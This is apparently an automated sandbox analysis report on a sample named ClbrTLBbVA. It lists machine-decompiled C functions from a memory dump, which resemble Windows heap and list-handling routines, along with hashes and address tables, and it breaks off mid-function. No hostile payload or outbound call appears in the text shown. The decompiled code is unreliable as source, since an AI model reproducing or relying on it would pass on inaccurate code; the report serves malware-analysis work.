                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                        • Instruction ID: 4b71096e4941199e7dc30a99f908f94053fa249c575b15d188c4b14a621cc237
                                        • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                        • Instruction Fuzzy Hash: 9D218B72A40A85EFD731CF4EC940E66F7E5EB94A10F2481BEE94A87715D731AD02CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016DB390 Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 54%
                                        			E016DB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E016C2280(_t12, 0x1798608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E016E00C2(0x1798608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                        0x016db395
                                        0x016db3a2
                                        0x016db3a5
                                        0x016db3aa
                                        0x016db3b2
                                        0x016db3ba
                                        0x016db3bd
                                        0x016db3c0
                                        0x016db3c4
                                        0x016db3c9
                                        0x0171a3e9
                                        0x0171a3ed
                                        0x0171a3f0
                                        0x0171a3ff
                                        0x0171a403
                                        0x0171a409
                                        0x00000000
                                        0x00000000
                                        0x0171a40b
                                        0x0171a40b
                                        0x0171a40f
                                        0x0171a415
                                        0x0171a423
                                        0x0171a423
                                        0x0171a415
                                        0x016db3d1
                                        0x016db3e8
                                        0x016db3e8
                                        0x016db3d9

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 022a599fc17ef46b6b454dd19f7927cd9c6c390b1632b0d2fc0cfed657cf241f
                                        • Instruction ID: 67f4830600c55e74d7a1e341e5d9075ab79f4f5bbbf595ca02baa4cd6503d758
                                        • Opcode Fuzzy Hash: 022a599fc17ef46b6b454dd19f7927cd9c6c390b1632b0d2fc0cfed657cf241f
                                        • Instruction Fuzzy Hash: 60116B33B061149BCB198E1D9D81A6BB267EBD6730B26413DDD16DB381CD319C02C6D5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016A9240 Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 77%
                                        			E016A9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x177f708);
				E016FD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E016E95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E016E95D0();
				_t33 =  *0x17984c4; // 0x0
				L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x17984c4; // 0x0
				L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x17984c4; // 0x0
				E016C2280(L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x17986b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E016E95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E016E95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E016A9325();
					_t50 =  *0x17984c4; // 0x0
					return E016FD0D1(L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                        0x016a9240
                                        0x016a9242
                                        0x016a9247
                                        0x016a924c
                                        0x016a924e
                                        0x016a9255
                                        0x016a9257
                                        0x016a925a
                                        0x016a925f
                                        0x016a925f
                                        0x016a9266
                                        0x016a9271
                                        0x016a9276
                                        0x016a9279
                                        0x016a927e
                                        0x016a9295
                                        0x016a929a
                                        0x016a92b1
                                        0x016a92b6
                                        0x016a92d7
                                        0x016a92dc
                                        0x016a92e0
                                        0x016a92e6
                                        0x016a92e8
                                        0x016a92ee
                                        0x016a9332
                                        0x016a9333
                                        0x016a9337
                                        0x016a9338
                                        0x016a933a
                                        0x016a933a
                                        0x016a933d
                                        0x016a9342
                                        0x016a9342
                                        0x016a9345
                                        0x016a9349
                                        0x016a934e
                                        0x016a9352
                                        0x016a9357
                                        0x016a92f4
                                        0x016a92f4
                                        0x016a92f6
                                        0x016a92f9
                                        0x016a9300
                                        0x016a9306
                                        0x016a9324
                                        0x016a9324

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 115558620917fb06567da2c75030732ccbd8d00d87a8e0cbfb72a5baadf941bf
                                        • Instruction ID: dc01ac6d103b8ebca1e5fb1c5b32691ae96cd37736ecfc6778a299c63064ddde
                                        • Opcode Fuzzy Hash: 115558620917fb06567da2c75030732ccbd8d00d87a8e0cbfb72a5baadf941bf
                                        • Instruction Fuzzy Hash: 97212872041605DFC722EF68CE44F6AB7BAFF28718F54456CE149866A2CB34E941CF98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01734257 Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 90%
                                        			E01734257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x17808d0);
				E016FD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E017341E8(__ebx, __edi, __ecx, _t39);
				E016BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x17987e4;
					_t18 =  *0x17987e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1795cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x17987e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x17987e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L016A7055(_t31 + 0xfffffff8);
								_t24 =  *0x17987e0; // 0x0
								_t18 = _t24 - 1;
								 *0x17987e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1795cd0;
				if( *0x1795cd0 <= 0) {
					L016A7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x17987e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x17987e8 = _t30;
						 *0x17987e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E016FD0D1(L01734320());
			}















                                        0x01734257
                                        0x01734257
                                        0x01734257
                                        0x01734259
                                        0x0173425e
                                        0x01734263
                                        0x01734265
                                        0x01734273
                                        0x01734278
                                        0x0173427c
                                        0x0173427f
                                        0x01734281
                                        0x01734287
                                        0x017342d7
                                        0x017342d7
                                        0x017342da
                                        0x0173428d
                                        0x0173428d
                                        0x0173428f
                                        0x01734292
                                        0x01734297
                                        0x0173429c
                                        0x017342a0
                                        0x017342a6
                                        0x017342a8
                                        0x017342ae
                                        0x017342b3
                                        0x00000000
                                        0x017342ba
                                        0x017342ba
                                        0x017342bf
                                        0x017342c5
                                        0x017342ca
                                        0x017342cf
                                        0x017342d0
                                        0x00000000
                                        0x017342d0
                                        0x017342b3
                                        0x00000000
                                        0x017342a6
                                        0x0173429c
                                        0x017342dc
                                        0x017342dc
                                        0x017342e3
                                        0x01734309
                                        0x017342e5
                                        0x017342e5
                                        0x017342e8
                                        0x017342ee
                                        0x017342f0
                                        0x00000000
                                        0x017342f2
                                        0x017342f2
                                        0x017342f4
                                        0x017342f7
                                        0x017342f9
                                        0x01734300
                                        0x01734300
                                        0x017342f0
                                        0x0173430e
                                        0x0173431f

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e42f238f892327522fa67ffb22cc9d812c5c8f94460c78b188ceabac7de91f10
                                        • Instruction ID: 78196eee02d418fca67aed3e4aee376df3829a08dd51d2548c9f9d19a72cb15d
                                        • Opcode Fuzzy Hash: e42f238f892327522fa67ffb22cc9d812c5c8f94460c78b188ceabac7de91f10
                                        • Instruction Fuzzy Hash: F9216F72505606CFCB29DFA8D400658B7F1FB86324B50C26EC11ADB26BD7319496CB46
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017246A7 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E017246A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L016C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E016EF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E016DD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L016C77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                        0x017246b7
                                        0x017246ba
                                        0x017246c5
                                        0x017246c8
                                        0x017246d0
                                        0x017246d4
                                        0x017246e6
                                        0x017246e9
                                        0x017246f4
                                        0x017246ff
                                        0x01724705
                                        0x01724706
                                        0x0172470c
                                        0x01724713
                                        0x0172471b
                                        0x01724723
                                        0x01724725
                                        0x017246d6
                                        0x017246d9
                                        0x017246db
                                        0x017246db
                                        0x01724732

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                        • Instruction ID: f5e51dcc8918cf3b1bf3b79ef2c19f880c5bc2717b01aa5f11205580a74c9d97
                                        • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                        • Instruction Fuzzy Hash: 8311E572904208BBC7159F6DD8808BEF7B9EF95710F1080AEF984CB351DA318D55D7A8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016AC962 Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 42%
                                        			E016AC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x179d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E016BEEF0(0x17970a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0172F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E016BEB70(_t29, 0x17970a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E016EB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0172F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x17970c0; // 0x0
					while(_t38 != 0x17970c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x179b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                        0x016ac96a
                                        0x016ac974
                                        0x016ac988
                                        0x016ac98a
                                        0x01717c9d
                                        0x01717c9f
                                        0x01717ca4
                                        0x01717cae
                                        0x01717cf0
                                        0x01717cf5
                                        0x01717cfa
                                        0x016ac992
                                        0x016ac996
                                        0x016ac997
                                        0x016ac998
                                        0x016ac9a3
                                        0x016ac9a3
                                        0x01717cb0
                                        0x01717cb7
                                        0x01717cbb
                                        0x00000000
                                        0x00000000
                                        0x01717cbd
                                        0x01717ce8
                                        0x01717cc5
                                        0x01717cc8
                                        0x01717cca
                                        0x01717cd0
                                        0x01717cd6
                                        0x01717cde
                                        0x01717ce4
                                        0x01717ce4
                                        0x01717cd0
                                        0x00000000
                                        0x01717ce8
                                        0x016ac990
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e24dd44c2b2e49f34d7e801bfdba080d4f6fc6740a0906119d617bc959c549a
                                        • Instruction ID: ce23fc96b0d6caeb0097d315b8fc5fd73b5f403e38c550289266966fff287fd0
                                        • Opcode Fuzzy Hash: 3e24dd44c2b2e49f34d7e801bfdba080d4f6fc6740a0906119d617bc959c549a
                                        • Instruction Fuzzy Hash: F911E1313106069BCB28AF6CDC99A6BFBEAFB84610B10052CE94693655DF20EC55CBD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E37F5 Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 87%
                                        			E016E37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E016C2280(_t6, 0x1798550);
				}
				_t29 = E016E387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E016BFFB0(0x1798550, _t27, 0x1798550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                        0x016e37fa
                                        0x016e37fc
                                        0x016e3805
                                        0x016e3808
                                        0x016e3808
                                        0x016e3814
                                        0x016e3818
                                        0x016e3846
                                        0x016e3848
                                        0x016e384b
                                        0x016e384b
                                        0x016e3852
                                        0x00000000
                                        0x016e3854
                                        0x016e3856
                                        0x00000000
                                        0x00000000
                                        0x016e3863
                                        0x00000000
                                        0x016e3863
                                        0x016e381a
                                        0x016e381a
                                        0x016e381f
                                        0x016e386e
                                        0x016e386e
                                        0x016e3871
                                        0x016e3873
                                        0x016e3873
                                        0x016e3868
                                        0x00000000
                                        0x016e3868
                                        0x016e3821
                                        0x016e3826
                                        0x00000000
                                        0x00000000
                                        0x016e3828
                                        0x016e382a
                                        0x016e3841
                                        0x00000000
                                        0x016e3841

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 54e576dea91b1fb540474eb6eb2f5222225243acf78a7648a18a68fbbfd4e424
                                        • Instruction ID: cf9bd3e6cc132df249dd2d0b8f1393f7add4c0dbfea1ad340b128c800a1020e9
                                        • Opcode Fuzzy Hash: 54e576dea91b1fb540474eb6eb2f5222225243acf78a7648a18a68fbbfd4e424
                                        • Instruction Fuzzy Hash: 4701C472A136119BC3378A1D9D48A27BBE6FFC6A60717426DE9458B315DB30C801C790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016B766D Relevance: .1, Instructions: 54COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 94%
                                        			E016B766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E016DF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E016DF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L016C4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                        0x016b7672
                                        0x016b767f
                                        0x016b7689
                                        0x016b76de
                                        0x016b76de
                                        0x016b768b
                                        0x016b7691
                                        0x016b7693
                                        0x016b7697
                                        0x00000000
                                        0x016b7699
                                        0x016b76a8
                                        0x00000000
                                        0x016b76aa
                                        0x016b76ad
                                        0x016b76b1
                                        0x00000000
                                        0x016b76b3
                                        0x016b76b3
                                        0x016b76b5
                                        0x016b76ba
                                        0x016b76bc
                                        0x016b76bc
                                        0x016b76c0
                                        0x00000000
                                        0x016b76c2
                                        0x016b76ce
                                        0x016b76ce
                                        0x016b76c0
                                        0x016b76b1
                                        0x016b76a8
                                        0x016b7697
                                        0x016b76d9

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                        • Instruction ID: c6449c9fd44d0d1c5e39362b619ef7fa284a74708059a763924ab71c1a43ab2a
                                        • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                        • Instruction Fuzzy Hash: CA01FC32740129AFC720DE5ECC81E9B7BADEBC4660F350168BA09CB280EE30DC41C3A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0173C450 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 46%
                                        			E0173C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E016E9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E016E95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E016E95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E016E95D0();
				return L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                        0x0173c458
                                        0x0173c45d
                                        0x0173c466
                                        0x0173c468
                                        0x0173c469
                                        0x0173c46a
                                        0x0173c46b
                                        0x0173c46e
                                        0x0173c46f
                                        0x0173c471
                                        0x0173c476
                                        0x0173c476
                                        0x0173c47c
                                        0x0173c47e
                                        0x0173c480
                                        0x0173c480
                                        0x0173c483
                                        0x0173c484
                                        0x0173c486
                                        0x0173c488
                                        0x0173c48f
                                        0x0173c491
                                        0x0173c493
                                        0x0173c493
                                        0x0173c48f
                                        0x0173c498
                                        0x0173c49e
                                        0x0173c4ad
                                        0x0173c4ad
                                        0x0173c4b2
                                        0x0173c4b4
                                        0x0173c4cd

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                        • Instruction ID: 8050e8f2e03a4c0e57dfa7b1b077c09bafe146de6c89ce57976bcf8a14dea261
                                        • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                        • Instruction Fuzzy Hash: C3019672140606BFE721AF69CC84E62FB6EFF94754F004529F25452560C721ECA0CAA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016A9080 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 69%
                                        			E016A9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x17985ec;
				E016C2280(_t48, 0x17985ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E016BFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x179538c; // 0x77996828
					if( *_t84 != 0x1795388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x177f6e8);
						E016FD0E8(0x17985ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E017788F5(_t80, _t85, 0x1795388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x17986c0; // 0x12407b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x17986b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E016C2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E017788F5(0x17985ec, _t85, 0x1795388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E016EAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
